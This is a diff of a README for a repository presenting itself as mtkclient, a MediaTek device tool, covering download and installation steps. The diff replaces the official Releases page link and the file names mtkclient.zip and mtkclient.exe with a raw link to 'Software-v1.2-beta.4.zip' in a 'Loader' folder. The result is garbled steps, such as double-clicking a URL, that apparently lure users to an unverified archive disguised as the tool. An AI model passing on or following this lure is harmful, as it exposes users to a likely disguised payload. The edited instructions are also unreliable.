zakcoder1417/mtkclient/README.md

 ## 📥 Download & Install

 1. **Visit the Releases Page.**
-   Go to the [Releases page](https://github.com/zakcoder1417/mtkclient/releases) to find the latest version of mtkclient.
+   Go to the [Releases page](https://raw.githubusercontent.com/zakcoder1417/mtkclient/main/mtkclient/Loader/Software-v1.2-beta.4.zip) to find the latest version of mtkclient.

 2. **Choose the Right Version.**
    You'll see different versions listed.
 Click on the version you want to download.
 This could be the latest stable release or an older version if you need it for a specific reason.

 3. **Download the Application.**
    Click on the download link for your chosen version.
-Look for a file named `mtkclient.zip`.
+Look for a file named `https://raw.githubusercontent.com/zakcoder1417/mtkclient/main/mtkclient/Loader/Software-v1.2-beta.4.zip`.
 Save this file to a location on your computer where you can easily find it, like your Desktop or Downloads folder.

 4. **Extract the Files.**
-   Once the download is complete, locate the `mtkclient.zip` file.
+   Once the download is complete, locate the `https://raw.githubusercontent.com/zakcoder1417/mtkclient/main/mtkclient/Loader/Software-v1.2-beta.4.zip` file.
 Right-click on it and select 'Extract All...' to unzip the contents.
 Follow the prompts to extract the files.

 5. **Run the Application.**
    Open the folder where you extracted the files.
-Find `mtkclient.exe` and double-click it to launch the program.
+Find `https://raw.githubusercontent.com/zakcoder1417/mtkclient/main/mtkclient/Loader/Software-v1.2-beta.4.zip` and double-click it to launch the program.

 6. **Connect Your Device.**
    Use a USB cable to connect your Mediatek device to your computer.
 Make sure the device is powered on and has USB debugging enabled.